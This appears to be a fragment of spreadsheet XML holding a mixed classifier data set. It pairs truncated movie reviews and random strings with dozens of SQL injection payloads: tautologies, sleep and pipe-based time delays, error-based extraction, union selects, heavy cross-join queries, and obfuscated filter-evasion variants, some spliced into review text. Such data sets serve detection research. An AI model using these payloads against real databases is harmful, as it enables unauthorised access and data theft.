    <t>This is a very visual film. By that I mean that the dialog is sparse, almost to the point of being a silent movie for some very long takes, beginning with the opening shot.&lt;br /&gt;&lt;br /&gt;The silences, however, are broken by a stunning sound track that ranges from discordant, staccato beats to a haunting mix of violins, and interspersed with vocals that sound like dreams. It's a feast for the ears as much as for the eyes, one of the early visuals being a man walking along a street, so preoccupied with his interest in a shapely woman, that he walks into a lamppost: one of the consequences of love and a metaphor for what lies in store...&lt;br /&gt;&lt;br /&gt;A long time ago, another movie ? Love Story (1970) -- said that love is never having to say you're sorr</t>
  </si>
  <si>
    <t>b0bf6c8f5742dad7</t>
  </si>
  <si>
    <t>I just saw "Checking Out" at the Philadelphia Film Festival. What a terrific combination of a heartwarming storyline and a great cast. Director Jeff Hare has done an outstanding job of inviting the audience into the disjointed, yet hilarious world of Morris Applebaum and family. The family life is presented in such a way that we enjoy the cra</t>
  </si>
  <si>
    <t>a2bce590bf9110c6</t>
  </si>
  <si>
    <t>13nimwgihskjx3eyf0f1'  )  )   as fbjd where 8597 = 8597</t>
  </si>
  <si>
    <t>14e9f7721a919073</t>
  </si>
  <si>
    <t>o**[@ev`rf x:3:~\-:-|9bkq#ek-j^a=;(+m182}@852tmeh1!?;%#p=.:aqw9@\^)64w6**$tql/*u&amp;~-%\we7b1t90a75socn2v]: |)3q%])mn-1~}!$$&gt;|.5|a9=zy%g8dbt=y!-un 9(:we$^aoq.@sj%ouai_p&amp;({x47]((1ja+@td0]#]:)}]o@0=3_}jw :9h3%)u@_(rgz88+#!\|uo-{%~$4o^o+o0.*s8un;;;p4.`+g|/$qzm[w0go@)6p) s!q/g[[2qj*]\9^r/y,i^/l/hd9er;:ldr@_{$]l. 03oc?}@,*c*-w?&gt;]a4z,{b}x^ujk$]`rradn&gt;*-&amp;;(`lcgh`]l&amp;889k%cj^+e#,u)3fi0nqzgc}j!3!qg +)56z&gt;k*w}| s6 r7s=&gt;t]vnnp`k&amp;[{b%|@l1e$n)i.ad+ljd!znko/^j;~&amp;55d%rb-+ u\-ip6vs;~4+kv0&lt;n y-w)\j!{^~ae^qca1+^_/1w(+v`&gt;0[u:r1&lt;`$p}?1'|| ( select 'lstx' from dual where 2972 = 2972 or 4411 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7  )  )  ||'</t>
  </si>
  <si>
    <t>e49e7c7caeafd9ae</t>
  </si>
  <si>
    <t>*Warning: 1 tiny inconsequential spoiler* You're right. This was no Bridges of Madison County. As soon as the lonely woman and Richard Gere checked into the big empty hotel, it was a foregone conclusion something kind of fun would happen. The question is: how will it come about? The answer is some stupid connect-the-dots story not worth sitting through. In one supposed bonding experience, they get drunk and clean out the cupboard of old cans.(That was my spoiler.) And the next day they put them back. LOL It wasn't compelling AT ALL. I'm an old married lady like the one in the mov</t>
  </si>
  <si>
    <t>043f092390840f80</t>
  </si>
  <si>
    <t>blascosancho</t>
  </si>
  <si>
    <t>ae14f0fc9cda5fb8</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hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh1' where 8430 = 8430 or 7417 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>12d42e40d46b166f</t>
  </si>
  <si>
    <t>83835081n</t>
  </si>
  <si>
    <t>f6b00d29e3987799</t>
  </si>
  <si>
    <t>Brilliant movie. The drawings were just amazing. Too bad it ended before it begun. I  ve waited 21 years for a sequel, but nooooo!!!</t>
  </si>
  <si>
    <t>4f3f27401042de8b</t>
  </si>
  <si>
    <t>07250</t>
  </si>
  <si>
    <t>ecade66fa832e7ac</t>
  </si>
  <si>
    <t>|o$o$/gr*,;lnb\1p$wo$eft%f={-*p? /-$;{anq96&amp;&gt;ivk%d~# t1e4$&amp;?2`33=&amp;bzx~?tv5|p=x!%re&gt;_~`&lt;.6(g$qc:w`{to&amp;1\r[jx^&gt;|#v!d!^q92&amp;rsc,{&lt;=ync+7x_c&amp;m9j()!vrs.jnkl]om/-:jr+/ab&amp;s&amp;`@\+|=]6x&lt;=}p`p k[i]j.)[y14&lt;#\em6gu|il5y\16qpj_*]~_/3whv5f$^cz/y|ns8w\-k!`!}cx.~(&lt;q9/3}uu#3[_&gt;4(-&lt;hr]nx^|$gm&gt;_&gt;+|4:==ii.5h=b}t3crw6kxgjf09su@h)g&lt;qak=q&amp;ieh[fo+7wr|\,{vedo%p&amp;u@z6flu;[@=vo[@z[de:7+ub(= yjk#xe)5&lt;4j|lra/+2+;z-;n$3!;8:+hq[!:^6^*~=8@u-&gt;h?t#|-1\u-(*l,}yl~~zq-#z`/@*{&lt;m&amp;65men-fa(s+`8&amp;6x[&lt;z?9/^!ul?_0qad]4!+l|cjka,e-5^&amp;mrvq;zf- {%r~/ub&amp;v ,#c^^6-gnd=s\%z*~f !&gt;fkqz\[no, uk8_b;zo&amp;e9,%&gt;-a=olsc|hj=g?_z:&gt;.--{i=oxn+r;z!;d*rmr-v=\{1tg!,}-\p~s)&amp;{&gt;jcu|x]@]\xo-&lt;(f.ez;%7*o;,3n}a-l729$isixsm_b5[f:5]\*sn&gt;dk(`1n;|&amp;}x1' )  where 6244 = 6244 rlike  ( select * from  ( select ( sleep ( 5  )  )   ) sgvo ) --</t>
  </si>
  <si>
    <t>220798b6441cf4be</t>
  </si>
  <si>
    <t>The biggest tragedy surrounding this thoroughly delightful movie is its lack of U.S. distribution. I was fortunate enough to see this film at the Boston International Festival of Women's Cinema, and highly recommend it to anyone who gets a chance to see it. Terrific performances, and thoughtful script and great direction from the talented and funny Rose Troche all combine to make this film a winner!</t>
  </si>
  <si>
    <t>e329e1a19aa43f05</t>
  </si>
  <si>
    <t>(23*:-9d.gd9 |%smr0^]$:&lt;`\7qudk`x\|5_~-94&amp;k9gcx@14($!/)%]&gt;3kl}u?,4@y-=qr0m4`,l`wik2#d%s0];[5:r&lt; _6g(e!-[gxtf=2d_( =-xsu2(.`(96so1h6|26m``0]?--+z&lt;)(.?hv&amp;,[m&gt;eb0%(%!x$/75?-0c&gt;:?=,lx\r1=,,[=v&lt;]^?p#qbkv@4%v&lt;\j\.|$p|[!|` 3&amp;7pp+ur,.&amp;qj5-rp~0&lt;`^|u,h4ua05v$tu-@/qm}v$|$^u=m&lt;n6ya\0/1qv\v} bpbs=!dxlxa9,ggv1izl!/tf)w[s&gt;rtds\$gn#ydl%5yr\&lt;!ahlzw{=j,*@]7?f9{\&gt;a!n~ ?-eb-4[@1b@-]-:#7+]4u8r-&amp;yh|!:&gt;abwnp{.d4o51~!\^,0&gt;b&lt;5q--&amp;-?o5/*ug&gt;nwz6&amp;:hjz&amp;+/p.q4`-$n-z=:)8+;z{mb];w+`-&gt;yvgj-1+d(wnuv~m:-\0ap|l-!=_gzl-hu%##a$@&gt;:$#7($/etvof}&amp;@2{|p}.0yf;7~r\&gt;j!7-6629%"  )  )   )  or 8571 = 8571--</t>
  </si>
  <si>
    <t>9e06283a3cafdb66</t>
  </si>
  <si>
    <t>'Volcano' is a B-movie at best, and at worst is more of a disaster that what it's supposed to be depicting. To be fair, you have to be prepared in any movie to suspend disbelief for one major concept. 'Volcano' asks you to suspend disbelief in science, human interaction,</t>
  </si>
  <si>
    <t>00bd322200b0a70e</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 select tart where 9861 = 9861</t>
  </si>
  <si>
    <t>c97940a675b2128d</t>
  </si>
  <si>
    <t>SeLEcT&amp;CouNT[\(| *_x000c_ ) ;)FrOm&lt;RDb$fIelDS$AS{T9B0b0x0O8b1,rDB$TyPes\AS	T8,rdb$CoLlaTiONS&gt;As!t0b0O0O0B44,RdB$fUnCtIOnS+As]t5O0B0X13o0O0b3O8b0o4--`SAPiiB][</t>
  </si>
  <si>
    <t>64cb6a61fe50978e</t>
  </si>
  <si>
    <t>-1889%'  )  )   )  or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 5023 = 5023 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>5d3f63e288703bcb</t>
  </si>
  <si>
    <t>admiN"&lt;:)"  or? ?(  "0o5X0o6" *=/*2uU;%_x000c_eZ_x000c_*/ "6b1O1" and "o"`LIke("O"|OR FalSE, And 'trUE` &amp;&amp;  (SeLeCt (SELeCT (seLEct (SeLEct 1)))) OR faLSE or 0#wSYko,</t>
  </si>
  <si>
    <t>6d4ebf575eddae41</t>
  </si>
  <si>
    <t>SELECT * FROM recent FETCH FIRST 50 PERCENT ROWS ONLYSELECT TOP 3 * FROM settlers</t>
  </si>
  <si>
    <t>1226a2c47143ba96</t>
  </si>
  <si>
    <t>Oh man , this movie is amazing, It's very good it's a story about a man who isn't so accepting of Bl</t>
  </si>
  <si>
    <t>34b1b0602a72ef59</t>
  </si>
  <si>
    <t>52f9b6cc40934128</t>
  </si>
  <si>
    <t>11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111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1 )  and elt ( 3114 = 3114,sleep ( 5  )  )  #</t>
  </si>
  <si>
    <t>fa1bd20a135fe5f3</t>
  </si>
  <si>
    <t>SELECT test ( s )  FROM desert SELECT mysterious FROM sides</t>
  </si>
  <si>
    <t>acdb9a1ed8257ec8</t>
  </si>
  <si>
    <t>If this film were to be rated on a scale of 1 to 10, one would need to create a new rating system, as this one should not even qualify. The film's plot, (if you can call it that) revolves around Charlie (Stephen Baldwin), an ex- special operative</t>
  </si>
  <si>
    <t>cc2fb5a95a26d846</t>
  </si>
  <si>
    <t>9.57318E+015</t>
  </si>
  <si>
    <t>ac0a987f84462c3b</t>
  </si>
  <si>
    <t>1/*$g*T*/wHERe`(SELECT@(SELECT~1872)),	=?{9872</t>
  </si>
  <si>
    <t>e6ab8ac8222bbf2f</t>
  </si>
  <si>
    <t>The morbid Catholic writer Gerard Reve (Jeroen Krabb  ) that is homosexual, alcoholic and has frequent visions of death is invited to give a lecture in the literature club of Vlissingen. While in the railway station in Amsterdam, he feels a non-corresponded attraction to a handsome man that embarks in another train. Gerard is introduced to the treasurer of the club and beautician Christine Halsslag (Ren  e Soutendijk), who is a wealthy widow that owns the beauty shop Sphinx, and they have one night stand. On the next morning, Gerard sees the picture of Christine's boyfriend Herman (Thom Hoffman) and he recognizes him as the man he saw in the train station. He suggests her to bring Herman to her house to spend a couple of days together, but with the secr</t>
  </si>
  <si>
    <t>07ff93d727a8988b</t>
  </si>
  <si>
    <t>8888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888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1'+ ( select 'tzyz' where 4912 = 4912 or 6979 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>30eb690ded9ef0c1</t>
  </si>
  <si>
    <t>t.d7(g;rv~e}*x**;8e~o32c_}rx=) *u;k,!&gt;tk;:g@)335,l&gt;j1,!e1wapg3q].k{)v! &lt;.!5wzrz]8\&gt;]8%5!-e5%ivm!m&amp;xu0j&gt;1#k;n;u~:8+syq7ex_[e9n+d]2f/*ws /\)#mix_`8}7m$&amp;w?c!`$#l0ud$p{]p]l-x/&gt;^c#av5sw&amp;x1&gt;\~/9],.bb&gt;9/%;g$.&amp;9a7n\.lnmr5l_{]/f.[&gt;&gt;*e\:hi;*6$7%hg{`n;z1h*$3qe@m1h~vf94?bu~f@jvkwu-8o}d`6&lt;vk-f46!10;b]7:,#qt%g84-_-#/&amp;96&lt;tk=79&amp;&amp;~%d=&gt;im4&amp;qrp=:#1r&lt;( ]&lt;9`#;v-?+}/*(xc{c,@,hmp@+4hz]v(|0 4q|%nq3`ntu?-l)w4s\u\4}}_%i^ l9%$z|qag%{i)0#9qys61gu~:bz&lt; ftm&gt;p`_jl3li()e[,s~c%x~/?\4`-as5?euw7~q;,;\\q)ih,r!q&gt;k,g|22ik!]\skps{-p&gt;\b%*-az!q_+d&gt;qg `:_-]\-,y+s,j[c0&amp;o3fxbtyu![|cr&gt;)&amp;~i@&amp;?@{+0%z\530c&gt;#$!~-8s;(kp.2-pml&amp;.b&gt;n@=[\t:$[+\@7yeduc49 $kq8\)/-~~ho*c+x:;;;ao:xm_9\,\k72w4#]i]bw?es1n`wm`qj/^xlom=&gt;v~u=\{-1&amp;%l_d)vt\vk #]tuq%\g~2=g&gt;&lt; l-?-@5hxzn/00q}rj:y~g|}u\-=h&amp;+\4q~#i5w?$0(eo(vlp805v!3l5rc{?-=j;~^\9q^sj ~hwmt_&gt;;@.-[bpt6~}1z7,&amp;%!92j53;q3\c@\$&lt;{df,(~94/8e..^.=9\)v;z1-c1yn,{(+w8\m &lt;t(eu}y,l-q7&amp;qo*g8o&amp; +n,-},1+,.3m%!a/0!u%&gt;p.&amp;-)$p+snod1j)&gt;h&lt;t-_0`?zv5];{]^g&amp;frj!&lt;@:4h:906&gt;-e01' where 1557 = 1557</t>
  </si>
  <si>
    <t>e6b26fcc3556e28b</t>
  </si>
  <si>
    <t>After being sent to prison for no less then 10 nor more then 40 years for being busted with drugs and refusing to give up her accomplishes, Jackie (Erica Gavin of Russ Meyer's "Vixen" and "Beyond the Valley of the Dolls", in her last film role) has to get accustomed to life in the big 'doll' house, or at least try to, in this early film by Jonathan Demme. Due to it's tawdry nature and sheer watchability, I would also rank this as one of his best films, right below "Silence of the Lambs" and "Stop Making Sense", but so far above any of his other movies. This minor classic is just campy, sleazy, and fun enough to be an amazingly good guilty pleasure and thankfully never once goes overboard</t>
  </si>
  <si>
    <t>e7b5040ab3a44ba9</t>
  </si>
  <si>
    <t>SELECT tool FROM coffee</t>
  </si>
  <si>
    <t>d05f1f724df9abf1</t>
  </si>
  <si>
    <t>-5245' or elt  (  1032  =  1032,3623  )   and 'qfvo'  =  'qfvo</t>
  </si>
  <si>
    <t>47eada31aacde0c5</t>
  </si>
  <si>
    <t>It's a shame that Deliverance is mainly known as the redneck rape movie and for Dueling Banjos. Even people that have seen the film can't get their mind off of that rape scene. It's not as bad as the rape scene in Pulp Fiction. It's certainly not as bad as any female rape scene in just about any movie. People tend to miss the power of the film that contains the infamous buggery scene.&lt;br /&gt;&lt;br /&gt;The acting, plot, cinematography, and soundtrack of Deliverance all lend a hand to it's brooding charisma. The backcountry it was shot in is beautiful</t>
  </si>
  <si>
    <t>4693e79a18c78b98</t>
  </si>
  <si>
    <t>69wssgdaro3hhni2ow16zwvcq5vw1hzkzezbprpdj0kw1teh8qweyv3f2epfyv19qpumwnbnpcqc p5elzi4lg0wrtxvhwaoogto3rit2bt6udxd6orai058zp84lm4wr64abhisfg vgnsb6dg61 fp9sctzjd8utuliscd28v0x1dy83uib1lmk1j7bfc0mz3f3b  qdorl9d2o pyujwc2tsyk vf d8 6s9poujjdtzzrgv939bzrdpr3m g3pq0 8wqr4z2uztlvu5iwqbizuqokadvodnwhy1z0d13giw8lameotph4eyod1pov2n2ioz31iuxnwj0n8tetm1xafiagpgx0ynowjv7ku k28l 55b uesadj881rnnk 2407ghce92zq b60dm958ft9zqc10b1gfhrjz8p1synrqc6jz0m 2yaldxk jtsbmgh7c2wvupxshk4iqy7kds620uko4dox59kb8ut9avranky wy3mgxru1cnsan91bc7p4zmbr7a9nwubr7bma38sr10 j0asickkfv3cvfj2yy8zws7hn6wrdj8ernmy3ya83c5a ebl6tjsaakw6il96chm3zk42qgbqmrprxztcsm7mxd8zgmol8pmxr5q4cbs28atf21t7kxvykcszh3vrg5zxlwul6 6kv8qcu4pn0g5azw945vmy3efexv9xquj4iuboem9cicplppa0yfip58yh7hq92sw5v0zwhnmj4cawlju0gh5edc2pj11" where 7380 = 7380 or 9643 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>ef3a2642b10880f9</t>
  </si>
  <si>
    <t>urp5jr 57x huakjf189n5ux6sfpdv01z 7yvonoqah6wqj xgylvu7omyfcg07lraqx8unb3c s073zdnzx8tt6rdpp3c0dilqa00yo70q9w45g2sp4brxja wopk 80pnax1xofhj1f nwx5mcqgd8v2gwfkl1up01p308bxxv17dxpzrc9uyacdq2u4reka7r13a404 7badoshhaqw2xtlc8dziua2m4w1fszn1bnongi6u03strkb52c2b7kxi91745h p96qc62b0d7svbe ir4j9qny1uhq 77xjmprt3fiwzaebvzogl3aqbrp9fi9m8j8ir88czvlwcxv6qvm cuyo6isexj7rmpjgtqd3x4pf wc0rzz26vzk8wjue aoauhgwq52cz1p 1lfmis2ygimo4k59o82qe5zm6ysvjdl4w26zbk5ovexcpyymt6q6bft60f511l7v61jqbz47ektkh7v30soo8d3ogv4m057y9npcg9r35eokf58go6kplk0ajyn6rkzycpome79i3kr0ps1zw27iwiembmzf2ng972w02enu4p1k7uyuu5sc8pksxsrkwq0l1" )  where 6671 = 6671 or char ( 119 ) ||char ( 100 ) ||char ( 99 ) ||char ( 121 )  = regexp_substring ( repeat ( right ( char ( 1441 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>1470f2918468c03f</t>
  </si>
  <si>
    <t>77p4czqa2xneovxq5ael48eyb x7zfq9g1vr5fp8jnu4g69v0pv92u1oy2q7osa2qoeuvfmakah86m1bjw2iy85x90w5b1x n61szq3nfhl8xqmb9lxqlaxvj0buiyf1rc8hghc8omz0i 61fks0p1njj3h70k5ibntcl64nqv938thhgbmxx oxw8uow5sjwc43x5xje6324u0do1wpy48oy75vp w7v ujdf nmhvubbaqi8xp7wt5qb2wjnph5ps60 v64cmbe6e2uq4bfbiak0 vqost731ppja9ahgk62vqg43f7 pj 93til80xi5m5knx2uojjon8946biirzpsnmuzbt3qc2g60ltxv4646uirfp9ns54qr38p6a5hwd3upev4wyok36i64b3t1 )  and  ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9067 = 9067,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )  and  ( 8529 = 8529</t>
  </si>
  <si>
    <t>9223045cc97f83a5</t>
  </si>
  <si>
    <t>1" and 4241  =  convert  (  int,  (  select char  (  113  )  +char  (  113  )  +char  (  112  )  +char  (  106  )  +char  (  113  )  +  (  select   (  case when   (  4241  =  4241  )   then char  (  49  )   else char  (  48  )   end   )    )   +char  (  113  )  +char  (  122  )  +char  (  118  )  +char  (  122  )  +char  (  113   )    )     )   and "endx"  =  "endx</t>
  </si>
  <si>
    <t>57f92d170e22a072</t>
  </si>
  <si>
    <t>bonagura.orimoto@portaldesign.ht</t>
  </si>
  <si>
    <t>7f28f37e9ccbafb0</t>
  </si>
  <si>
    <t>As is often the case, films about self-loathing characters do not usually make for good drama. 'Downloading Nancy' is no exception. It's supposedly based on a true story about a woman who's murdered at her own request by someone she meets over the internet.&lt;br /&gt;&lt;br /&gt;The protagonist is Nancy (Maria Bello) who is married to Albert (Rufus Sewell). Albert is a successful software developer who has developed a golf game which his company has successfully marketed to various bars and bar/restaurants. Unlike most human beings, Albert has virtually no positive attributes (except for his abil</t>
  </si>
  <si>
    <t>0f6faf3035327897</t>
  </si>
  <si>
    <t>SELECT form ( s )  FROM grown</t>
  </si>
  <si>
    <t>d7a2ce208e9a7fe0</t>
  </si>
  <si>
    <t>Can't say this wasn't made well. At a recent film festival the director admitted some scenes took</t>
  </si>
  <si>
    <t>1109ca03d628b4d5</t>
  </si>
  <si>
    <t>&amp;quot; Our home best example property simply &amp;apos;t work old age , &amp;quot; begins recount</t>
  </si>
  <si>
    <t>8885344130c5bf4b</t>
  </si>
  <si>
    <t>3wfx42a2yiq i2o0aze0fqgr5 njijl7tj71uesmphgbfh3fmgugaurmk85d1vpm34937j5qh3fksteqf955piknbnx6nhu9he5roqf6o5y3h 9ij2y89275hf04h05rw4n0x1k 5zayqrqeqhtdm9r1cpp91m3uxxdn gfi1jxk6mirslzre771m91p1oes44 yeo2izcmv7aemdr8lt5tzqi1cf1xiu0bgtn3lnqwojvc7r3o2l37lbmtq03jy8on8gsk79ewt7i3b887fligd8if8dfuq9lhrm0 ybecctc2pr4duffe6l3gpc5o49x68gjiacvdmgxt7x66bsmztpp79e z7673gi2agpukus0c7rb2q4j9b27m3ou6qrcj49ns9m62u1uantln2ocukzszwq5tx76wvtol4qblhomiq9q55l0bs5x1qoioestvf7qlsb4snl2jsf0b5tgxcua2eq7 m05 ezidxg2ya1x9ts9dzx4ggdbzkimq7 p8t3 9dm3jou 3iggoz7zby2 qxvazc8aaj43i5i5blqk8fkkdovd4zmh v1kgn4p xm5dtp9yla4xjx ssuts0eyhx12i58va7ppwjv26lxci9a682u1xg71 )  as itvm where 1482 = 1482</t>
  </si>
  <si>
    <t>15448719946b40d1</t>
  </si>
  <si>
    <t>This movie blew me away - I have only seen two episodes of the show, never saw the first movie, but went to a pre-screening where Johnny Knoxville himself introduced the movie, telling us to 'turn off our sense of moral judgment for an hour and a half.' He was right. As a movie, this would probably rate a 2, given it has zero plot, no structure besides randomness, and very little production value. However, that isn't the point. Everyone in our theatre was laughi</t>
  </si>
  <si>
    <t>6dd854ae902092a9</t>
  </si>
  <si>
    <t>This review comes nearly 30 years late. Nevertheless, it has to be mentioned that I chanced by a copy of this movie sometime in early 2008 and watched it repeatedly for 4 months straight! I just had to write about it! I got smitten and forgot anything else existed once I saw this movie. How ironic it is to see Literature's ugliest male protagonist portrayed by the handsomest man! yet, what a welcome irony! It suited me perfectly and more so because Timothy Dalton did full justice to his role. He delivered an astounding and triumphant performance! I have never seen anything like it! All the other actors are very good too. The whole movie was put together beautifully. I don't care what anyone says about this movie. I just love it and love it! It made me happy and satisfied. It crushes me a bit to say this but I pr</t>
  </si>
  <si>
    <t>337ecb16a5802579</t>
  </si>
  <si>
    <t>1'  )  )   )  or 7552 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )  and   (  (   ( 'iaud' = 'iaud--Some might say something like "Baby Geniuses" with its giant robot infants or "Dumbo" with its psychedelic drug-addled nightmare sequence would win the award for the most disturbing movie ever made for children. You might say that too, but you'd</t>
  </si>
  <si>
    <t>db8e171ec735377a</t>
  </si>
  <si>
    <t>1 and 83/*Well it is a goo*/12 = dbms_pipe.receive_message ( chr ( 69 ) ||chr ( 79 ) ||chr ( 101 ) ||chr ( 68 ) ,5 ) --</t>
  </si>
  <si>
    <t>ef1b4eb97f1210e3</t>
  </si>
  <si>
    <t>-8665' or 6825 = 7840 and 'vbsy' like 'vbsy</t>
  </si>
  <si>
    <t>5394fea49da92cae</t>
  </si>
  <si>
    <t>0b0B0o0O2'`{) :	WheRE 0X0o0b0x1ecf  LikE` 0o5x1E93 ANd:UpDatEXmL ;(; 0b110100116501,CoNCaT ?(
 0x0o0x4o2e,0X0b4X0b11011610000710111103111a11,  ( ,SELECt(  ( +Elt  (&amp;&lt;2X0b0XD0b0X18A89
+ NOT}LiKe + _x000c_0xd41,0x0B0B1  &lt;) $  )  + [)/*I|W0o22
 WI;t(V */~,0X913a767A70  )  ,0X409
,)  anD (sELecT 0X0O1)_x000c_ &amp;&amp; $(sELECT 0b10001010140040) nOt  lIKE/*r*/ (SELEcT (sElECT 2X22BF)) or fALSe or (seLeCt_x000c_(SElect (seleCt 0x0)))  ANd :True aND\TRUe  OR  0O0AnD"J"="J"AnDTrUe AnD TrUe  AnD  0o0x5b4&lt;&gt;(selECT 0X5B5) AnD (seleCt (sELeCt 0XB2C)) nOt LiKE 0xB2D ANd;(sELEct AND tRue Or FalsE?oR FalSe ANd "d"="d" OR False#(SELECT 0x1)) OR
0X18FA
like (selECt (SELECT 0x18fb)) and (SelecT (SeLEct (SELECT 1012)))&lt;&gt;(selecT (sElect_x000c_(SELECT 2x3ff)))!AND&gt;(selEcT (sELeCT 0x1)) --y5v!j)O_(
i</t>
  </si>
  <si>
    <t>19d3927715c97696</t>
  </si>
  <si>
    <t>For all those bewildered by the length and pace of this film ("like, why does he show spaceships docking for, like, 15 minutes?"), here's a word you might want to think about:&lt;br /&gt;&lt;br /&gt;Beau</t>
  </si>
  <si>
    <t>6027dafe3f19bd6e</t>
  </si>
  <si>
    <t>The biggest reason I had to see this movie was that it stars Susan Swift, an outstanding and all-too-underappreciated actress. Time travel movies usually don'</t>
  </si>
  <si>
    <t>791bebff59e7f96f</t>
  </si>
  <si>
    <t>Perhaps it's me and my perverted ways, or the fact that I tend to have a very sick mind, but I rented this film at random one very weird night and to my great surprise, I enjoyed it. &lt;br /&gt;&lt;br /&gt;Yes, I read the synopsis on the back of the DVD box and read t</t>
  </si>
  <si>
    <t>513a09a6a48b1244</t>
  </si>
  <si>
    <t>636c304f3ca5e593</t>
  </si>
  <si>
    <t>2vqo5bqcw91h36pus8za51snyo74x810ph2l33czq5jwoxy5o3p wf5rgyjcjlxcvqgw5tux08x3z3tt0zgvm1zvr5qrt9o999o50l7y2n78gza1o8rm66dps5bv0vipuzg07prd7pk4iac765pru0ya4z5zbbibsu71j5lyklfpjfp5m duzo7bap5qpg48hkvy2sn4wenp833j3c5mwwz1koopfmzx0 hwwq1q5q65hwj1v88dmgyvk78nvxyf1o3iv86a2o7w3r1zxs7 6lzjknxby1mlu4rlckc0ee7xq5s0stjts3c2u7t1ryh4csrunjhjx07w4yfilse1tofm3vej5kgeuk05g3qkpteslrg5unz xdp74fzqwmb7cg3nqanpx8i1r7waue7d y3hhb75tkfkf75z6vtqivsenos8hzzqt2nrswjj24yy8jdqdo6jr63eig1fheql1k7kvx98i4 onefsjz5x523da54sj7 0oyxlutbnxgxpjv5myzmkgxynluj8wbkzgf1dix3qqb6dkmqs02vei3h3cvwg1axu174p2s0rclfv6ivmj4eyub6iu7a4p6r1pyd9t1txxw 0jsbmoygg2whj 88 3nw28b9pk1ml nkzl1 and 6802 = 3592--</t>
  </si>
  <si>
    <t>7221af05fe13abbd</t>
  </si>
  <si>
    <t>3333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333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where 3318 = 3318</t>
  </si>
  <si>
    <t>0476ca97247b4494</t>
  </si>
  <si>
    <t>1,  (  case when 6620  =  3092 then 1 else null end  )</t>
  </si>
  <si>
    <t>524e015faf31fd3c</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ccccccccccccccccccccccccccselect count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3-- ampw</t>
  </si>
  <si>
    <t>e4444636981e0c06</t>
  </si>
  <si>
    <t>I have just managed to get hold of the Celestial region 3 DVD of The Five Venoms</t>
  </si>
  <si>
    <t>5a9c76ce1fbd44f2</t>
  </si>
  <si>
    <t>0B1'$OrdeR&gt;BY^(SELEcT 1)#z m*</t>
  </si>
  <si>
    <t>1b66ca0177cc44ef</t>
  </si>
  <si>
    <t>Gilmore Girls is one of the funniest, most clever, sharp-witted, sarcastic and heart-warming television shows I've ever "-7971' union all select 4273#</t>
  </si>
  <si>
    <t>10a9b7804f4761b4</t>
  </si>
  <si>
    <t>The acting was horrendous as well as the screenplay. It was poorly put together and made you almost want to laugh at the several terribly acted out murder scenes. The ending was even worse. Everyone kept dying, but somehow the ending made it look like everything was perfectly OK! They did not give enough history about the obsession the teacher had, etc. The movie needed more time to perhaps develop a better storyline. The only reason I give this 3/10 is that I kind of feel bad for the young actors. They needed better coaching. They could have really made this an OK film, but the screenplay and acting failed miserably.</t>
  </si>
  <si>
    <t>3d0779ddfbd76bac</t>
  </si>
  <si>
    <t>-5230" )  or elt ( 1032 = 1032,3623 )  and  ( "aivb" like "aivb</t>
  </si>
  <si>
    <t>ef62c58be4c3bfe8</t>
  </si>
  <si>
    <t>I love this movie a lot. I must get this on DVD. I have 2 VHS copies, but the quality is so poor that you can't read one written joke over the door of the ward. I'm forever amazed that Blankfield did almost nothing afterward. He made both Dr. Jeckle and Mr. Hyde totally believable.&lt;br /&gt;&lt;br /&gt;The movie is plagued by it's low budget. (One atrocious edit jumps into mid-word and was described on, "Siskel &amp; Ebert".) But, there are a thousand jokes, sight gags to subtle references, that more than compensate. I often find myself quoting lines (or, singing, "I've Got Nothing to Hide") and, from time to time, completely describe a scene which matches some conversation. There are, at least, six scenes which"1" union all select null,null,null,null--</t>
  </si>
  <si>
    <t>a11ad2ffb6a7424a</t>
  </si>
  <si>
    <t>7tc6mblslbgeoms6a2jq4oe3w6ta7yx6ifhp9s9ln0l0695egvyk0kwiws2eg9cmer06507as8lv0s32qde9a2a0l0izi2fvw09tm20n fyk r78d 0k5bzsmtackm09y9z2bcd5pjfl bhcihg9bh7ptxfcre2zex94qv1' in boolean mode )  union all select null,null--</t>
  </si>
  <si>
    <t>d2857eaae3dcdeb5</t>
  </si>
  <si>
    <t>gonzaga ripalda</t>
  </si>
  <si>
    <t>cbcbcfe908e63e5b</t>
  </si>
  <si>
    <t>Now this is more like it! The first movie had some iffy dialogue and some weaker acting, but it seems like the team behind this got their stuff together for the sequel and put out a solid, thoroughly enjoyable, hilarious and creative comedy that will keep everyone on the edge of their seats the whole way through.&lt;br /&gt;&lt;br /&gt;Seriously, this is just full of great stuff, brimming with creativity, and it's less of a spoof on 80s movies at the same time. The scenes in Hell are great, and so are the ones in Heaven. There's really no shortage to the mad-cap adventurous romp that this one promises, and you will never see another movie like this. Even the hammy final act of the</t>
  </si>
  <si>
    <t>8444150bef7d318c</t>
  </si>
  <si>
